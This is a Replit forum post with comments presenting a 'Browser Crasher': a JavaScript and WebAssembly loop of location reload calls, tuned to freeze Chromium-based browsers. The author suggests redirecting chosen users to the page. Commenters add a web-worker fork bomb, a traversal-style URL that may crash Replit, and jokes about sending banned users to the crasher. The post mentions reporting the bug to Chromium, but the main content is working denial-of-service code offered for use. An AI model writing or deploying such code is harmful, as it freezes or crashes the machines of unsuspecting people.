Share your repls and programming experiences

← Back to all posts
Browser Crasher
xxpertHacker (930)

About a month ago, I had opened Chromium bug reports explaining this, informing them that a single page can crash a whole browser, but they... seem to have not really cared, so Chromium is okay with it, thus this cannot be considered illegal or malicious, as the developers don't care.


Update

As of today, September 9th, Chromium finally acknowledged this bug and successfully replicated it, meaning the bug should be fixed within the year.


Update #2

They don't care, they closed the report.


Looping location.reload quickly in JavaScript can lock up the browser.
But... many factors come into play:

  • Page size: large pages load slower, thus they reload slower too, if it's too slow, it's completely ineffective, although annoying.
  • Loading speed: Related to the previous point, but there is more to loading than size, and HTML is just slow to parse in general, especially poorly designed HTML.
  • Execution speed: There are a few micro-optimizations that can be applied to improve the performance of the loop.

So, how do you beat all 3?

CSS: A style-less page will load faster than one with style, so I cut it out.
Loading speed: Cut out everything unnecessary for a basic webpage to test the crash. HTML is slow to parse, so I used XHTML instead. Lastly, the page has no external data to fetch, it's all in one page.
Execution speed: There's much that can be done to improve speed here:

  • Simply opting into "strict mode" improves performance noticeably.

An example of what we could use:

for (;;) {
    location.refresh();
}

This is straightforward and simple, but... it's not at it's best. refresh takes a boolean argument determining whether or not to reload from the server or cache, true indicating that it should load from the server.
As we used location.refresh, we kept doing a method lookup, directly binding to the function would be better.

const { reload } = location;

Unfortunately, reload exists on the prototype of the Location class, it requires the this of the location object, so it needs to be bound, put together:

"use strict";

const refresh = location.refresh.bind(location, false);
// false -> load from cache; faster than HTTP request to the server

for (;;) {
    refresh();
}

Now, that is probably the best you can do in JavaScript... but JavaScript isn't the only option for usage on the web, and I know how to use the other one: https://en.wikipedia.org/wiki/Webassembly. Wasm loads faster than JavaScript, parses faster, and executes faster, so you know what I did.

(import "location" "reload" (func $reload))

(func $_start
	loop
		call $reload
		br 0 ;; jumps to the inner most block,
		;; thus it repeats this loop
	end
)

(start $_start) ;; execution flow starts here

What the attached Wasm looks like in JavaScript is essentially just this:

import reload;

function _start() {
    for (;;) {
        reload();
    }
}

Very similar, yet what difference is there? It's faster in every way, that's it.

Now, why would you use this webpage? Maybe you want to redirect specific users from a specific URL on your server to it? ¯\_(ツ)_

Go check the source, run the page, have fun!


Report this to your browser vendor

I have already opened a Chromium report regarding this bug myself.
If you are on another browser, ex: Firefox, Safari, Edge, Opera, and this works, please report it to them as appropriate.
This bug is very annoying, I have personally opened the page too many times while developing it, and it almost crashed my low RAM computer :)

Comments
hotnewtop
Barry123 (350)

@xxpertHacker pretty impressive, but

How do you un-crash the browser?!

xxpertHacker (930)

@Barry123 Oh, umm... now that's for another day. :)

Barry123 (350)

Yay now I fixed it :D

LD1 (53)

Doesn't appear to work on safari, but it works on Chrome, Chromium, and Brave

xxpertHacker (930)

@LD1 Ooh, you use Brave too? That's the browser I developed this on!
Safari doesn't support JavaScript modules on XHTML pages, that should be reported.

programmeruser (596)

You don't need to exploit a bug, you can just fork bomb with web workers:

while (true) {
  const worker = new Worker('script.js');
}

It makes your RAM usage skyrocket to 97%.
Demo: https://web-worker-fork-bomb.programmeruser.repl.co
Also, there's a related bug report on Firefox's Bugzilla: https://bugzilla.mozilla.org/show_bug.cgi?id=537527.

xxpertHacker (930)

@programmeruser What? That won't work in FF, FF has a worker cap of 20.

Btw, CSS is more dangerous than JS or Wasm. :)

programmeruser (596)

@xxpertHacker but it will on chrome, I think it uses one process for each web worker. https://gofile.io/d/HiuUnY

Btw, CSS is more dangerous than JS or Wasm. :)

Why?

xxpertHacker (930)

@programmeruser On FF, it's just a memory problem with allocating a bunch of Worker objects and associated JSRuntimes, on Chrome I expect an actual fork bomb.

Oh, in that case, when Wasm gets access to threads, fork bombing will be fun!

I'll make a whole new post, not unlike the current one that we're on, but using CSS, and link you to it.

programmeruser (596)

@xxpertHacker I think I found a claim code that crashes Replit; could you test it so that I can make sure that it isn't just a problem on my side?
https://replit.com/claim?code=../../../../hi/there
Make sure to wait a bit, then try resizing the window or clicking a button in the sidebar.

xxpertHacker (930)

@programmeruser Nope, no effect on mobile Firefox. Tried desktop site too on mobile browser.

adsarebbbad (216)

virtual machine go brrr

xxpertHacker (930)

@adsarebbbad mhm, sure made my browser's VM go "brrrrrrrrrrrrrrrr"

CodeLongAndPros (1622)

@Jasperscode Hello, I'm the admin. First of all, no cursing. I'm removing it, but next time it's a warning. Second, this repl falls within ToS and therefore is allowed. Anything else you'd like to say?

xxpertHacker (930)

@CodeLongAndPros Honestly, when I first talked about trying to post this, I thought that it would've been removed by the moderators, but then I laughed when I saw a mod upvote it.

Also, @Jasperscode this isn't even malicious. You need to see other Repl types; they force the web page to open here, so you would've already been attacked. At least you have to actually open the HTML Repls.

Jasperscode (14)

@CodeLongAndPros it nearly destroyed my computer idiots!# ban this

CodeLongAndPros (1622)

@Jasperscode Please tell me how. What did you do. I dare say you were warned well. And you tried it. This is your problem.
I'll take this down if and only if it caused actual damage to your hardware.

Jasperscode (14)

@CodeLongAndPros I had to replace my CPU, GPU, and motherboard.

xxpertHacker (930)

@Jasperscode Lmao, I'm sure that you did.

@CodeLongAndPros You know what... I had asked a moderator on the Discord before posting this, in fact, I think I had specifically asked you.

CodeLongAndPros (1622)

@xxpertHacker I don't recall. I was still new back then, I probably just asked H.

CodeLongAndPros (1622)

@Jasperscode Proof? Esp. since a while true can't break the GPU.
Actually, no. I'm not going to take this post down. You can either suck it up and reboot your computer, or get warned for spam. Your move.

xxpertHacker (930)

@CodeLongAndPros I barely remembered that I had asked, but I doubted that you would've remembered either, it was some time ago.

@Jasperscode This shouldn't have affected GPU usage at all :/
Any good CPU ought to be able to handle this.

Lastly, I've used an old Windows 7 and it nearly crashed the PC, but the hardware was perfectly fine.

CodeLongAndPros (1622)

@xxpertHacker (also it's broken on Firefox for iOS)

xxpertHacker (930)

@CodeLongAndPros Oh, I know, I tested iOS and mobile, completely ineffective. Great on desktop Chromium though!

It's likely because it's not an HTML document executing the code.

You know what, I need to go report that...

DungeonMaster00 (190)

for some reason this didnt crash firefox on ubuntu but i closed a window and it was still running so i had to restart my pc

xxpertHacker (930)

@DungeonMaster00 Oh, you're lucky, it crashed quite a few other people, including myself (more than once).

Some browsers it won't work on at all (eg: Safari), and practically all mobile browsers, since they simply don't support running that webpage properly.

Also, why didn't you try using a task manager or something similar, if you hadn't crashed?

DungeonMaster00 (190)

@xxpertHacker didnt think of it

also i reccomend ubuntu because it is basically an easy-to-use linux distribution

xxpertHacker (930)

@DungeonMaster00 Hmm... I'll pass, but at least we agree that we would prefer to use Linux, is that good enough?

LD1 (53)

I wouldn't recommend trying this on Firefox on Mac. I tried it, and now I can't get it unfrozen (deleting and reinstalling, rebooting). Nothing seems to work. Good thing is that I don't use firefox.

xxpertHacker (930)

@LD1 RIP, that sounds bad, you might want to try to report that for us.

LD1 (53)

@xxpertHacker Yes, I got it to work again and reported it. Seems like it just takes time for firefox to unfreeze, rebooting and reinstalling for whatever reason didn't work (at least not for me)

Leroy01010 (409)

i found out how to uncrash the browser

CodingRobot12 (182)

This seems cool but based on the other people's comments I am not going to run it lol

xxpertHacker (930)

@CodingRobot12 But, read the bottom of the post, you gotta run it lol.

johndo3 (21)

you destroyed my windows XP computer you owe me $10 jk

[deleted]

It froze my Chromebook for about 5 to 10 minutes! I had to shut it down for it to work again!

Leroy01010 (409)

I KNOW HOW TO UNCRASH THE BROWSER

SixBeeps (5223)

thus this cannot be considered illegal or malicious, as the developers don't care.

Ah yes, so I presume finding a security flaw in Windows and making a virus that exploits it is perfectly fine then?

Jokes aside, this is a nice find. It's incredible that this hasn't been patched yet, as it seems way too simple of a bug to use.

xxpertHacker (930)

@SixBeeps This is honestly the simplest bug I've spotted in a browser to date; I've seen people carefully thinking things outdoing some weird complicated stuff, carefully timing everything, etc, but this... it's effortless and surprisingly powerful, but it doesn't do too much, I can't steal your data or something.
But yeah I seriously did report it and they don't seem to care, someone might want to test if it affects Firefox, Safari, etc, and report it to them as appropriate.

RohilPatel (1581)

You know I like running:

location.href = "/haha";

on a server

xxpertHacker (930)

@RohilPatel Haha, maybe send your banned users here lol.

xxpertHacker (930)

@RohilPatel It's all right, all of my servers will redirect you here too :)